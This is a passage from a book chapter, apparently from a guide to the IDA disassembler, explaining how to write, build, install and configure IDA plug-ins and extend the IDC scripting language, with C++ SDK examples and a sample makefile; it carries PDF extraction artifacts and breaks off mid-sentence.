to create your own plug-ins or not, a basic understanding of plug-ins will

greatly enhance your experience using IDA, since, arguably, the majority of

third-party software developed for use with IDA is distributed in the form of

plug-ins. In this chapter, we begin the exploration of IDA modules by discuss-

ing the purpose of IDA plug-ins, along with how to build, install, and config-

ure them.

Plug-ins are probably best described as the compiled, albeit more power-

ful, equivalents of IDA scripts. Plug-ins are usually associated with a hotkey

and/or a menu item and are typically accessible only after a database has been

opened. Individual plug-ins may be general purpose in nature and useful

across a wide variety of binary file types and processor architectures, or they

316 Chapter 17

may be very specialized, designed to be used only with a specific file format

or processor type. In all cases, by virtue of being compiled modules, plug-ins

have full access to the IDA API and can generally perform much more com-

plex tasks than you could ever hope to accomplish using scripting alone.

Writing a Plug-in

All IDA modules, including plug-ins, are implemented as shared library com-

ponents appropriate to the platform on which the plug-in is expected to exe-

cute. Under IDA’s modular architecture, modules are not required to export

any functions. Instead, each module type must export a variable of a specific

class. In the case of plug-ins, this class is called a plugin_t and is defined in the

SDK’s loader.hpp file.

In order to understand how to create a plug-in, you must first understand

the plugin_t class and its component data fields (the class has no member

functions). The layout of the plugin_t class is shown here, with comments

taken from loader.hpp:

class plugin_t {

public:

int version; // Should be equal to IDP_INTERFACE_VERSION

int flags; // Features of the plugin

int (idaapi* init)(void); // Initialize plugin

void (idaapi* term)(void); // Terminate plugin. This function will be called

// when the plugin is unloaded. May be NULL.

void (idaapi* run)(int arg); // Invoke plugin

char *comment; // Long comment about the plugin

char *help; // Multiline help about the plugin

char *wanted_name; // The preferred short name of the plugin

char *wanted_hotkey; // The preferred hotkey to run the plugin

};

Every plug-in must export a plugin_t object named PLUGIN. Exporting your

PLUGIN object is handled by loader.hpp, which leaves you responsible for declar-

ing and initializing the actual object. Since successful plug-in creation relies

THE EVOLVING IDA API

Since SDK 4.9, Hex-Rays has attempted to minimize changes to existing API func-

tions between releases of IDA. One result of this policy is that binary plug-ins from

an older version of IDA can often be copied directly into newer IDA installations

and continue to work properly. Nonetheless, IDA’s API has grown with each new

release, introducing new functions and new options to take advantage of IDA’s ever-

expanding list of capabilities. As the SDK has evolved, Hex-Rays has opted to depre-

cate the occasional API function. When a function (or any other symbol) is deprecated,

Hex-Rays moves it into a code block bounded by a test of the NO_OBSOLETE_FUNCS

macro. If you wish to ensure that your plug-ins (or other modules) are not using any

deprecated functions, you should define NO_OBSOLETE_FUNCS prior to including any

SDK header files.

The IDA Plug-in Architecture 317

on properly initializing this object, we describe the purpose of each member

here. Note that even if you prefer to take advantage of IDA’s new scripted

plug-in capabilities, you will still need to familiarize yourself with each of

these fields because they are used in scripted plug-ins as well.

version

This member indicates the version number of the API that was used to

build the plug-in. It is typically set to the constant IDP_INTERFACE_VERSION,

which is declared in idp.hpp. The value of this constant has not changed

since the API was standardized with SDK version 4.9. The original intent

of this field was to prevent plug-ins created with earlier versions of an

SDK from being loaded into versions of IDA built with newer versions of

the SDK.

flags

This field contains various flags indicating how IDA should treat the plug-

in in various situations. The flags are set using a bitwise combination of

the PLUGIN_XXX constants defined in loader.hpp. For many plug-ins, assign-

ing zero to this field will be sufficient. Please refer to loader.hpp for the

meanings of each flag bit.

initThis is the first of three function pointers contained in the plugin_t

class. This particular member is a pointer to the plug-in’s initialization

function. The function takes no parameters and returns an int. IDA calls

this function to offer your plug-in a chance to be loaded. Initialization of

plug-ins is discussed in “Plug-in Initialization” on page 320.

termThis member is another function pointer. IDA calls the associated func-

tion when your plug-in is unloaded. The function takes no arguments

and returns no value. The purpose of this function is to perform any

cleanup tasks (deallocating memory, closing handles, saving state, and

so on) required by your plug-in before IDA unloads it. This field may

be set to NULL if you have no actions to perform when your plug-in is

unloaded.

run This member points to the function that should be called whenever a

user activates (via a hotkey, menu item, or script invocation) your plug-

in. This function is the heart of any plug-in, because it is here that the

behaviors users associate with the plug-in are defined. This is the func-

tion that bears the most resemblance to scripted behaviors. The function

receives a single integer parameter (discussed later under “Plug-in Exe-

cution” on page 322) and returns nothing.

comment

This member is a pointer to a character string that serves as a comment

for the plug-in. It is not used directly by IDA and can safely be set to

NULL.

318 Chapter 17

helpThis member is a pointer to a character string that serves as a multiline

help string. It is not used directly by IDA and can safely be set to NULL.

wanted_name

This member is a pointer to a character string that holds the name of the

plug-in. When a plug-in is loaded, this string is added to the EditPlugins

menu as a means of activating the plug-in. There is no requirement for

the name to be unique among loaded plug-ins, though it is difficult to

determine which of two identically named plug-ins will be activated

when the name is selected from the menu.

wanted_hotkey

This member is a pointer to a character string that holds the name of the

hotkey (such as "Alt-F8") that IDA will attempt to associate with the plug-

in. Here again, there is no need for this value to be unique among loaded

plug-ins; however; if the value is not unique, the hotkey will be associated

with the last plug-in to request it. “Configuring Plug-ins” on page 330 dis-

cusses how users may override the wanted_hotkey value.

An example of initializing a plugin_t object is shown here:

int idaapi idaboook_plugin_init(void);

void idaapi idaboook_plugin_term(void);

void idaapi idaboook_plugin_run(int arg);

char idabook_comment[] = "This is an example of a plugin";

char idabook_name[] = "Idabook";

char idabook_hotkey = "Alt-F9";

plugin_t PLUGIN = {

IDP_INTERFACE_VERSION, 0, idaboook_plugin_init, idaboook_plugin_term,

idaboook_plugin_run, idabook_comment, NULL, idabook_name, idabook_hotkey

};

The function pointers included in the plugin_t class allow IDA to locate

required functions in your plug-in without requiring you to export those

functions or to choose specific names for those functions.

The Plug-in Life Cycle

A typical IDA session begins with the launch of the IDA application itself and

proceeds through loading and analyzing a new binary file or existing data-

base before settling down to wait for user interaction. During this process,

there are three distinct points at which IDA offers plug-ins a chance to load:

1. A plug-in may load immediately upon IDA startup, regardless of whether

a database is being loaded or not. Loading in this manner is controlled

by the presence of the PLUGIN_FIX bit in PLUGIN.flags.

The IDA Plug-in Architecture 319

2. A plug-in may load immediately following a processor module and

remain loaded until the processor module is unloaded. Tying a plug-in

to a processor module is controlled by the PLUGIN_PROC bit in PLUGIN.flags.

3. In the absence of the flag bits just mentioned, IDA offers plug-ins the

opportunity to load each time a database is opened in IDA.

IDA offers plug-ins the opportunity to load by calling PLUGIN.init. When

called, the init function should determine whether the plug-in is designed

to be loaded given the current state of IDA. The meaning of current state varies

depending on which of the three preceding situations are applicable when

the plug-in is being loaded. Examples of states that a plug-in may be interested

in include the input file type (a plug-in may be designed specifically for use

with PE files, for example) and the processor type (a plug-in may be designed

exclusively for use with x86 binaries).

To indicate its desires to IDA, PLUGIN.init must return one of the follow-

ing values defined in loader.hpp.

PLUGIN_SKIP Returning this value signals that the plug-in should not

be loaded.

PLUGIN_OK Returning this value instructs IDA to make the plug-in

available for use with the current database. IDA loads the plug-in when

the user activates the plug-in using a menu action or a hotkey.

PLUGIN_KEEP Returning this value instructs IDA to make the plug-in

available for use with the current database and keep the plug-in loaded

in memory.

Once a plug-in has been loaded, it may be activated in one of two ways.

The most frequent method of activating a plug-in is at the direction of the

user in response to a menu selection or hotkey activation. Each time a plug-in

is activated in this way, IDA passes control to the plug-in by calling PLUGIN.run.

An alternate method for plug-in activation is for the plug-in to hook into

IDA’s event-notification system. In such cases, a plug-in must express interest

in one or more types of IDA events and register a callback function to be

called by IDA when any event of interest occurs.

When it is time for a plug-in to be unloaded, IDA calls PLUGIN.term

(assuming it is non-NULL). The circumstances under which a plug-in is

unloaded vary according to the bits set in PLUGIN.flags. Plug-ins that specify

no flag bits are loaded according to the value returned by PLUGIN.init. These

types of plug-ins are unloaded when the database for which they were loaded

is closed.

When a plug-in specifies the PLUGIN_UNL flag bit, the plug-in is unloaded

after each call to PLUGIN.run. Such plug-ins must be reloaded (resulting in a

call to PLUGIN.init) for each subsequent activation. Plug-ins that specify the

PLUGIN_PROC flag bit are unloaded when the processor module for which they

were loaded is unloaded. Processor modules are unloaded whenever a data-

base is closed. Finally, plug-ins that specify the PLUGIN_FIX flag bit are unloaded

only when IDA itself terminates.

320 Chapter 17

Plug-in Initialization

Plug-ins are initialized in two phases. Static initialization of plug-ins takes

place at compile time, while dynamic initialization takes place at load time

via actions performed within PLUGIN.init. As discussed earlier, the PLUGIN.flags

field, which is initialized at compile time, dictates several behaviors of a

plug-in.

When IDA is launched, the PLUGIN.flags field of every plug-in in <IDADIR>/

plugins is examined. At this point, IDA calls PLUGIN.init for each plug-in that

specifies the PLUGIN_FIX flag. PLUGIN_FIX plug-ins are loaded before any other

IDA module and therefore have the opportunity to be notified of any event

that IDA is capable of generating, including notifications generated by loader

modules and processor modules. The PLUGIN.init function for such plug-ins

should generally return either PLUGIN_OK or PLUGIN_KEEP, because it makes

little sense to request it to be loaded at startup only to return PLUGIN_SKIP in

PLUGIN.init.

However, if your plug-in is designed to perform a one-time initialization

task at IDA startup, you may consider performing that task in the plug-in’s

init function and returning PLUGIN_SKIP to indicate that the plug-in is no

longer needed.

Each time a processor module is loaded, IDA samples the PLUGIN_PROC

flag in every available plug-in and calls PLUGIN.init for each plug-in in which

PLUGIN_PROC is set. The PLUGIN_PROC flag allows plug-ins to be created that

respond to notifications generated by processor modules and thereby sup-

plement the behavior of those modules. The PLUGIN.init function for such

modules has access to the global processor_t object, ph, which may be examined

and used to determine whether the plug-in should be skipped or retained. For

example, a plug-in designed specifically for use with the MIPS processor mod-

ule should probably return PLUGIN_SKIP if the x86 processor module is being

loaded, as shown here:

int idaapi mips_init() {

if (ph.id != PLFM_MIPS) return PLUGIN_SKIP;

else return PLUGIN_OK; //or, alternatively PLUGIN_KEEP

}

Finally, each time a database is loaded or created, the PLUGIN.init func-

tion for each plug-in that has not already been loaded is called to determine

whether the plug-in should be loaded or not. At this point each plug-in may

use any number of criteria to determine whether IDA should retain it or not.

Examples of specialized plug-ins include those that offer behavior specific to

certain file types (ELF, PE, Mach-O, etc.), processor types, or compiler types.

Regardless of the reason, when a plug-in decides to return PLUGIN_OK (or

PLUGIN_KEEP), the PLUGIN.init function should also take care of any one-time

initialization actions necessary to ensure that the plug-in is capable of perform-

ing properly when it is eventually activated. Any resources that are requested

by PLUGIN.init should be released in PLUGIN.term. A major difference between

PLUGIN_OK and PLUGIN_KEEP is that PLUGIN_KEEP prevents a plug-in from being

repeatedly loaded and unloaded and thus reduces the need to allocate,

The IDA Plug-in Architecture 321

deallocate, and reallocate resources as might be required when a plug-in

specifies PLUGIN_OK. As a general rule of thumb, PLUGIN.init should return

PLUGIN_KEEP when future invocations of the plug-in may depend on states

accumulated during previous invocations of the plug-in. A workaround for

this is for plug-ins to store any state information in the open IDA database

using a persistent storage mechanism such as netnodes. Using such a tech-

nique, subsequent invocations of the plug-in can locate and utilize data

stored by earlier invocations of the plug-in. This method has the advantage

of providing persistent storage not only across invocations of the plug-in but

also across IDA sessions.

For plug-ins in which each invocation is completely independent of any

previous invocations, it is often suitable for PLUGIN.init to return PLUGIN_OK,

which has the advantage of reducing IDA’s memory footprint by keeping

fewer modules loaded in memory at any given time.

Event Notification

While plug-ins are quite frequently activated directly by a user via a menu

selection (EditPlugins) or through the use of a hotkey, IDA’s event-

notification capabilities offer an alternative means of activating plug-ins.

When you want your plug-ins to be notified of specific events that take

place within IDA, you must register a callback function to express interest in

specific event types. The hook_to_notification_point function is used to inform

IDA (1) that you are interested in a particular class of events and (2) that IDA

should call the function that you indicate each time an event in the indicated

class occurs. An example of using hook_to_notification_point to register inter-

est in database events is shown here:

//typedef for event hooking callback functions (from loader.hpp)

typedef int idaapi hook_cb_t(void *user_data, int notification_code, va_list va);

//prototype for hook_to_notification_point (from loader.hpp)

bool hook_to_notification_point(hook_type_t hook_type,

hook_cb_t *callback,

void *user_data);

int idaapi idabook_plugin_init() {

//Example call to hook_to_notification_point

hook_to_notification_point(HT_IDB, idabook_database_cb, NULL);

}

Four broad categories of notification exist: processor notifications

(idp_notify in idp.hpp, HT_IDP), user interface notifications (ui_notification_t

in kernwin.hpp, HT_UI), debugger events (dbg_notification_t in dbg.hpp, HT_DBG),

and database events (idp_event_t in idp.hpp, HT_IDB). Within each event category

are a number of individual notification codes that represent specific events for

which you will receive notifications. Examples of database (HT_IDB) notifica-

tions include idb_event::byte_patched, to indicate that a database byte has been

patched, and idb_event::cmt_changed, to indicate that a regular or repeatable

comment has been changed. Each time an event occurs, IDA invokes each

registered callback function, passing the specific event-notification code and

322 Chapter 17

any additional parameters specific to the notification code. Parameters sup-

plied for each notification code are detailed in the SDK header files that

define each notification code.

Continuing the preceding example, we might define a callback function

to handle database events as follows:

int idabook_database_cb(void *user_data, int notification_code, va_list va) {

ea_t addr;

ulong original, current;

switch (notification_code) {

case idb_event::byte_patched:

X addr = va_arg(va, ea_t);

current = get_byte(addr);

original = get_original_byte(addr);

msg("%x was patched to %x. Original value was %x\n",

addr, current, original);

break;

}

return 0;

}

This particular example recognizes only the byte_patched notification

message, for which it prints the address of the patched byte, the new value

of the byte, and the original value of the byte. Notification callback functions

make use of the C++ variable arguments list, va_list, to provide access to a

variable number of arguments, depending on which notification code is being

sent to the function. The number and type of arguments provided for each

notification code are specified in the header files in which each notification

code is defined. The byte_patched notification code is defined in loader.hpp to

receive one argument of type ea_t in its va_list. The C++ va_arg macro should

be used to retrieve successive arguments from a va_list. The address of the

patched byte is retrieved from the va_list at X in the preceding example.

An example of unhooking from database notification events is shown here:

void idaapi idabook_plugin_term() {

unhook_from_notification_point(HT_IDB, idabook_database_cb, NULL);

}

All well-behaved plug-ins should unhook any notifications whenever the

plug-in is unloaded. This is one of the intended purposes of the PLUGIN.term

function. Failure to unhook all of your active notifications will almost cer-

tainly result in crashing IDA shortly after your plug-in is unloaded.

Plug-in Execution

Thus far we have discussed several instances in which IDA calls functions

belonging to a plug-in. Plug-in loading and unloading operations result in

calls to PLUGIN.init and PLUGIN.term, respectively. User plug-in activation via

The IDA Plug-in Architecture 323

the EditPlugins menu or the plug-in’s associated hotkey results in a call to

PLUGIN.run. Finally, callback functions registered by a plug-in may be called in

response to various events that take place within IDA.

Regardless of how a plug-in comes to be executed, it is important to

understand a few essential facts. Plug-in functions are invoked from IDA’s

main event-processing loop. While a plug-in is executing, IDA cannot process

events, including queued analysis tasks or updates to the user interface. There-

fore it is important that your plug-in perform its task as expeditiously as possi-

ble and return control to IDA. Otherwise IDA will be completely unresponsive,

and there will be no way to regain control. In other words, once your plug-in

is executing, there is no simple way to break out of it. You must either wait

for your plug-in to complete or kill your IDA process. In the latter case, you

are likely to have an open database on your hands that may or may not be

corrupt and may or may not be repairable by IDA. The SDK offers three

functions that you may use to work around this issue. The show_wait_box

function may be called to display a dialog that displays the message Please

wait . . . along with a Cancel button. You may periodically test whether the

user pressed the Cancel button by calling the wasBreak function. The advan-

tage to this approach is that when wasBreak is called, IDA will take the oppor-

tunity to update its user interface, and it allows your plug-in the opportunity

to decide whether it should stop the processing that it is doing. In any case,

you must call hide_wait_box to remove the Wait dialog from the display.

Do not attempt to get creative in your plug-ins by having your PLUGIN.run

function create a new thread to handle the processing within your plug-in.

IDA is not thread safe. There are no locking mechanisms in place to synchro-

nize access to the many global variables used by IDA, nor are there any lock-

ing mechanisms to ensure the atomicity of database transactions. In other

words, if you did create a new thread, and you used SDK functions to modify

the database from within that thread, you could corrupt the database, because

IDA might be in the middle of its own modification to the database that con-

flicts with your attempted changes.

Keeping these limitations in mind, for most plug-ins, the bulk of the work

performed by the plug-in will be implemented within PLUGIN.run. Building on

our previously initialized PLUGIN object, a minimal (and boring) implementa-

tion for PLUGIN.run might look like the following:

void idaapi idabook_plugin_run(int arg) {

msg("idabook plugin activated!\n");

}

Every plug-in has the C++ and IDA APIs at its disposal. Additional capa-

bilities are available by linking your plug-in with appropriate platform-

specific libraries. For example, the complete Windows API is available for

plug-ins developed to run with Windows versions of IDA. To do something

more interesting than printing a message to the output window, you need

324 Chapter 17

to understand how to accomplish your desired task using available functions

from the IDA SDK. Taking the code from Listing 16-6, for example, we might

develop the following function:

void idaapi extended_plugin_run(int arg) {

func_t *func = get_func(get_screen_ea()); //get function at cursor location

msg("Local variable size is %d\n", func->frsize);

msg("Saved regs size is %d\n", func->frregs);

struc_t *frame = get_frame(func); //get pointer to stack frame

if (frame) {

size_t ret_addr = func->frsize + func->frregs; //offset to return address

for (size_t m = 0; m < frame->memqty; m++) { //loop through members

char fname[1024];

get_member_name(frame->members[m].id, fname, sizeof(fname));

if (frame->members[m].soff < func->frsize) {

msg("Local variable ");

}

else if (frame->members[m].soff > ret_addr) {

msg("Parameter ");

}

msg("%s is at frame offset %x\n", fname, frame->members[m].soff);

if (frame->members[m].soff == ret_addr) {

msg("%s is the saved return address\n", fname);

}

Using this function, we now have the core of a plug-in that dumps stack

frame information for the currently selected function each time the plug-in

is activated.

Building Your Plug-ins

On Windows, plug-ins are valid DLL files (that happen to use a .plw or .p64

extension), while on Linux and Mac, a plug-in is a valid shared object file

(that uses a .plx/.plx64 or .pmc/.pmc64 extension, respectively). Building plug-

ins can be a tricky matter, because you must get all of the build settings cor-

rect or the build process is almost certain to fail. The SDK contains a number

of sample plug-ins, each containing its own makefile. The makefiles were all

created with Borland’s build tools for Windows in mind. This poses some

challenges when you wish to build with a different tool chain or on a differ-

ent platform. The install_xxx.txt files included with the SDK discuss the use

of <SDKDIR>/bin/idamake.pl to build plug-ins using GNU make and gcc. The

purpose of idamake.pl is to generate a GNU make-style makefile from the

Borland-style makefiles and then invoke GNU make to build the plug-in.

The IDA Plug-in Architecture 325

Our preference for building plug-ins is to use simplified makefiles with

the GNU tools (via MinGW on Windows). The simplified makefile in List-

ing 17-1 can easily be adapted to your own plug-in projects:

#Set this variable to point to your SDK directory

IDA_SDK=../../

PLATFORM=$(shell uname | cut -f 1 -d _)

ifneq "$(PLATFORM)" "MINGW32"

IDA=$(HOME)/ida

endif

#Set this variable to the desired name of your compiled plugin

PROC=idabook_plugin

ifeq "$(PLATFORM)" "MINGW32"

PLATFORM_CFLAGS=-D__NT__ -D__IDP__ -DWIN32 -Os -fno-rtti

PLATFORM_LDFLAGS=-shared -s

LIBDIR=$(shell find ../../ -type d | grep -E "(lib|lib/)gcc.w32")

ifeq ($(strip $(LIBDIR)),)

LIBDIR=../../lib/x86_win_gcc_32

endif

IDALIB=$(LIBDIR)/ida.a

PLUGIN_EXT=.plw

else ifeq "$(PLATFORM)" "Linux"

PLATFORM_CFLAGS=-D__LINUX__

PLATFORM_LDFLAGS=-shared -s

IDALIB=-lida

IDADIR=-L$(IDA)

PLUGIN_EXT=.plx

else ifeq "$(PLATFORM)" "Darwin"

PLATFORM_CFLAGS=-D__MAC__

PLATFORM_LDFLAGS=-dynamiclib

IDALIB=-lida

IDADIR=-L$(IDA)/idaq.app/Contents/MacOs

PLUGIN_EXT=.pmc

endif

#Platform specific compiler flags

CFLAGS=-Wextra -Os $(PLATFORM_CFLAGS)

#Platform specific ld flags

LDFLAGS=$(PLATFORM_LDFLAGS)

#specify any additional libraries that you may need

EXTRALIBS=

# Destination directory for compiled plugins

OUTDIR=$(IDA_SDK)bin/plugins/

#list out the object files in your project here

326 Chapter 17

OBJS=idabook_plugin.o

BINARY=$(OUTDIR)$(PROC)$(PLUGIN_EXT)

all: $(OUTDIR) $(BINARY)

clean:

-@rm *.o

-@rm $(BINARY)

$(OUTDIR):

-@mkdir -p $(OUTDIR)

CC=g++

INC=-I$(IDA_SDK)include/

%.o: %.cpp

$(CC) -c $(CFLAGS) $(INC) $< -o $@

LD=g++

$(BINARY): $(OBJS)

$(LD) $(LDFLAGS) -o $@ $(OBJS) $(IDADIR) $(IDALIB) $(EXTRALIBS)

#change idabook_plugin below to the name of your plugin, make sure to add any

#additional files that your plugin is dependent on

idabook_plugin.o: idabook_plugin.cpp

Listing 17-1: A sample makefile for IDA plug-ins

The preceding makefile uses the uname command to determine the plat-

form on which it is running and configures some build flags accordingly. Addi-

tional source files can be added to the plug-in project by appending the names

of the associated object files to the $OBJS variable and to the end of the make-

file. If your plug-in requires additional libraries, you should specify the library

names in $EXTRALIBS. The $IDA_SDK variable is used to specify the location of

the <SDKDIR>, and $IDA_SDK may be specified as an absolute or a relative

path. In this example, $IDA_SDK is specified as a relative path, indicating that

<SDKDIR> lies two directories above the plug-in’s directory. This is in keeping

with locating plug-in projects within <SDKDIR>/plugins (<SDKDIR>/plugins/

idabook_plugin in this case). If you choose to locate your plug-in’s project

directory in some other location relative to <SDKDIR>, you must ensure that

$IDA_SDK properly refers to <SDKDIR>. Finally, the preceding example is con-

figured to store successfully compiled plug-ins in <SDKDIR>/bin/plugins. It is

important to understand that successfully compiling a plug-in does not nec-

essarily install the plug-in. We cover plug-in installation in the next section.

The use of Microsoft’s Visual C++ Express to build IDA modules is dis-

cussed in install_visual.txt. To create a project from scratch using Visual Stu-

dio 2008, perform the following steps:

1. Select FileNewProject to open the New Project dialog shown in Fig-

ure 17-1.

The IDA Plug-in Architecture 327

Figure 17-1: Visual Studio new project-creation dialog

2. Specify the project type as Visual C++/Win32, choose the Win32 Project

template, and provide the name and location for your project. We typi-

cally create new plug-in projects within the <SDKDIR>/plugins directory

in order to keep all of our plug-ins grouped together. When you click

OK, the Win32 Application Wizard appears. Click Next to get to the

Application Settings step and then set the Application type to DLL and

the Additional options to Empty project before clicking Finish, as shown

in Figure 17-2.

Figure 17-2: Visual Studio Win32 Application Wizard

328 Chapter 17

3. Once the basic framework of the project has been created, you must con-

figure a few additional settings. Project properties in Visual Studio 2008

are accessed via ProjectProperties, which brings up the dialog shown

in Figure 17-3. C/C++ configuration options only become available once a

source file has been added to the project, either by adding and editing a

new file or adding an existing file.

Figure 17-3: Visual Studio project properties dialog

The settings that require modification are spread throughout the Con-

figuration Properties section at the left side of the dialog. Figure 17-3 is rep-

resentative of the manner in which properties are set throughout a project.

For each property category selected in the left-hand portion of the dialog, a

list of configurable properties is displayed in the right-hand portion of the

dialog. Note that property categories are organized in a hierarchical fashion.

Properties are edited using file-selection controls, single-line edit controls,

multiline edit controls, or drop-down-list-selection controls. Table 17-1

details the properties that must be edited to create a plug-in project.

Note that Visual Studio allows you to specify separate configuration

options for Debug and Release versions of the project (see top left of Fig-

ure 17-3). If you intend to build separate Debug and Release versions of your

plug-in, make certain that you have modified the properties in both configu-

rations. Alternatively, you may save some time by selecting All Configurations

from the Configurations drop-down list (at the top left of the Properties

dialog), in which case your property changes will be applied to all build

configurations.

The IDA Plug-in Architecture 329

Installing Plug-ins

In comparison to the build process, plug-in installation is very simple. Install-

ing a plug-in is accomplished by copying the compiled plug-in module to

<IDADIR>/plugins. Note that Windows systems do not allow an executable

file that is in use to be overwritten. So to install a plug-in on a Windows sys-

tem, you must ensure that any previous version of the plug-in has been

unloaded from IDA. Depending on the plug-in loading options, a plug-in

may be unloaded when a database is closed. However, plug-ins that have

the PLUGIN_FIX flag set may require IDA to be shut down entirely before the

new plug-in can be copied to <IDADIR>/plugins.

On Linux and OS X systems, executable files can be overwritten while

they are in use, so you do not need to ensure that a plug-in is unloaded before

installing a new version of it. However, the new version of the plug-in will not

be loaded into IDA until the next time IDA offers plug-ins a chance to load.

Some IDA plug-ins are distributed in binary form only, while others are

distributed in both source and binary format. Installing such plug-ins usually

involves finding the proper version of the compiled plug-in for your version

of IDA and copying that plug-in to <IDADIR>/plugins. Make sure that you read

Table 17-1:

Visual Studio Plug-in Configuration Values (32-bit)

Configuration Property

Category Specific Property Property Value

General Output Directory As desired, often <SDKDIR>\

bin\plugins

C/C++General Additional Include Directories Add <SDKDIR>\include

C/C++Preprocessor Preprocessor Definitions Append “;__NT__;__IDP__”

C/C++Code Generation Runtime Library Multithreaded (Release)*

Multithreaded Debug (Debug)

(Not the DLL versions)†

* Multithreaded in this case refers to the C++ runtime library itself. IDA just happens to be a single-threaded

application that makes use of this library. A single-threaded version of the C++ runtime library does not

exist.

† Choosing the DLL versions of the C++ library requires that MSVCR80.DLL be present on the system on

which the plug-in will ultimately run. In order to remove this restriction, choose the non-DLL version of the

C++ runtime libraries, which produces a statically linked plug-in that is more portable.

LinkerGeneral Output File Change extension to .plw

LinkerGeneral Additional Library Directories Add <SDKDIR>\lib\

x86_win_vc_32‡

‡ Prior to SDK version 6.1, add library directory <SDKDIR>\lib\vc.w32.

LinkerInput Additional Dependencies Add ida.lib (from \lib\

86_win_vc_32)

LinkerCommand Line Additional options Add /EXPORT:PLUGIN

330 Chapter 17

the documentation (if any!) that accompanies any plug-in that you wish to

install, because some plug-ins require the installation of additional compo-

nents in order to function properly.

Configuring Plug-ins

IDA provides a limited ability to configure plug-ins via settings in <IDADIR>/

plugins/plugins.cfg. Settings in plugins.cfg can be used to specify the following

information about a plug-in:

zAn alternate menu description for the plug-in. This value overrides the

plug-in’s wanted_name data member.

zA nonstandard location or file extension for the plug-in. By default IDA

searches for plug-ins in <IDADIR>/plugins and expects plug-ins to have a

default, platform-specific file extension.

zAn alternate or additional hotkey used to activate the plug-in. This value

overrides the plug-in’s wanted_hotkey data member.

zAn integer value to be passed to the plug-in’s PLUGIN.run function each

time the plug-in is activated.

zAn optional DEBUG flag for use with debugger plug-ins. Debugger plug-ins

are discussed in Chapter 24.

The syntax of a valid plug-in configuration line is described in plugins.cfg.

A few examples of plug-in configuration lines are shown here:

; Semicolons introduce comments. A plugin configuration line consists

; of three required components and two optional components

; plugin_name plugin_file hotkey [integer run arg] [DEBUG]

The_IdaBook_Plugin idabook_plugin Alt-F2 1

IdaBook_Plugin_Alt idabook_plugin Alt-F3 2

The wanted_name and wanted_hotkey data members for a plug-in are chosen

by the plug-in’s author and compiled into the plug-in. It is entirely possible

that two plug-ins developed by different authors may have identical names or

identical hotkey associations. Within plugin.cfg, the plugin_name field specifies

the text (which overrides PLUGIN.wanted_name) to be added to the Edit

Plugins menu. It is possible to assign several names—and therefore several

menu items—to a single plug-in. Underscore characters in the plugin_name

field are replaced with space characters before the name is added to the

EditPlugins menu.

The plugin_file field specifies the name of the compiled plug-in module

file to which the current configuration line applies. If a full path is specified,

IDA loads the plug-in from the specified path. If no path is specified, IDA

looks for the plug-in in <IDADIR>/plugins. If no file extension is specified,

then IDA assumes a default plug-in extension for the current platform. If

a file extension is specified, IDA searches for an exact match to the plug-in

filename.

The IDA Plug-in Architecture 331

The hotkey field specifies the hotkey that should be used to activate the

plug-in. This field overrides the value of PLUGIN.wanted_hotkey and can be

used to resolve conflicting hotkey assignments when two plug-ins have been

built that use the same hotkey for activation. Alternatively, assigning more

than one hotkey to a plug-in offers the ability to activate a plug-in in more than

one way. In such cases, it is useful to specify unique integer arguments for

PLUGIN.run depending on which hotkey was used to activate a plug-in. When

you pass different integer values to PLUGIN.run, IDA makes it possible for a

plug-in to determine exactly how it was activated. This capability is useful

when a plug-in implements more than one behavior and each behavior is

selected based on how the plug-in is activated. In the preceding configura-

tion example, IDA passes the integer value 2 to idabook_plugin’s PLUGIN.run

function whenever the plug-in is activated via the ALT-F3 hotkey sequence.

Extending IDC

So far we have presented plug-ins designed primarily to manipulate or

extract information from a database. In this section, we present an example

of extending the capabilities of the IDC scripting language.1 As mentioned in

Chapter 16, IDC is implemented on top of the IDA API, so it should come as

no surprise that the API can be used to enhance IDC when the need arises.

In Chapters 15 and 16, you learned that IDC global arrays are actually a

somewhat restricted abstraction of netnodes. Recall that in IDC you create

global arrays by supplying a name and receiving an array ID in return. Inter-

nally your name gets prefixed with the string “$ idc_array ”, and the array ID

that you receive is actually a netnode index value. How could we go about

extending IDC in order to enable access to any netnode in an IDA database?

We can already access any netnode whose index we happen to know by using

the index as the array ID in IDC, so what we need is the ability to access any

netnode whose name we happen to know. IDC currently prevents us from

doing this because it prepends “$ idc_array ” to every netnode name we sup-

ply. Enter the SDK and the set_idc_func_ex function.

Defined in expr.hpp, set_idc_func_ex may be used to create a new IDC

function and map its behavior to C++ implementation. The prototype for

set_idc_func_ex is shown here:

typedef error_t (idaapi *idc_func_t)(idc_value_t *argv, idc_value_t *res);

bool set_idc_func_ex(const char *idc_name, idc_func_t idc_impl,

const char *args, int extfunc_flags);

Note that we have introduced the idc_func_t datatype here in order to

simplify the code somewhat. This datatype is not defined within the SDK.

The arguments to set_idc_func_ex specify the name of the new IDC function

that we are introducing (idc_name), a pointer to the C++ function that imple-

ments our new IDC behavior (idc_impl), a null-terminated array of characters

that specify the argument types and sequence for the new IDC function (args),

1. Note that there is currently no way to programmatically extend the IDAPython API from

within a compiled plug-in.

332 Chapter 17

and flags (extfunc_flags) indicating whether an open database is required or

whether the function never returns.

The following function, used as the initialization function for a plug-in,

completes the process by creating the new IDC function we are designing:

int idaapi init(void) {

Y static const char idc_str_args[] = { VT_STR2, 0 };

X set_idc_func_ex("CreateNetnode", idc_create_netnode, idc_str_args, 0);

return PLUGIN_KEEP;

}

This function creates the new IDC function CreateNetnode and maps it to

our implementation function idc_create_netnode X. The arguments to the

new IDC function are specified as being a single parameter of type string

(VT_STR2) Y.

The function that actually implements the behavior of CreateNetnode is

shown here:

* native implementation of CreateNetnode. Returns the id of the new netnode

* this id can be used with all of the existing IDC Array functions.

static error_t idaapi idc_create_netnode(idc_value_t *argv, idc_value_t *res)

{

X res->vtype = VT_LONG; //result type is a netnode index

Y if (argv[0].vtype == VT_STR2) { //verify we have the proper input type

Z netnode n(argv[0].c_str(), 0, true); //create the netnode

[ res->num = (nodeidx_t)n; //set the result value

}

else {

\ res->num = -1; //If the user supplies a bad argument we fail

}

return eOk;

}

The two arguments to this function represent the input argument array

(argv) containing all of the parameters to CreateNetnode (there should be only

one in this case) and an output parameter (res) used to receive the result of

the IDC function we are implementing. The SDK datatype idc_value_t repre-

sents a single IDC value. Fields within this datatype indicate the current type

of data represented by the value and the current contents of the value. The

function begins by specifying that CreateNetnode returns a long (VT_LONG)

value X. Since IDC variables are untyped, we must indicate internally what

type of value the variable is holding at any given moment. Next, the function

verifies that the caller of CreateNetnode has supplied an argument of type

string (VT_STR2) Y. If a valid argument has been supplied, a netnode is cre-

ated with the supplied name Z. The resulting netnode index number is

returned to the caller as the result of the CreateNetnode function [. In this

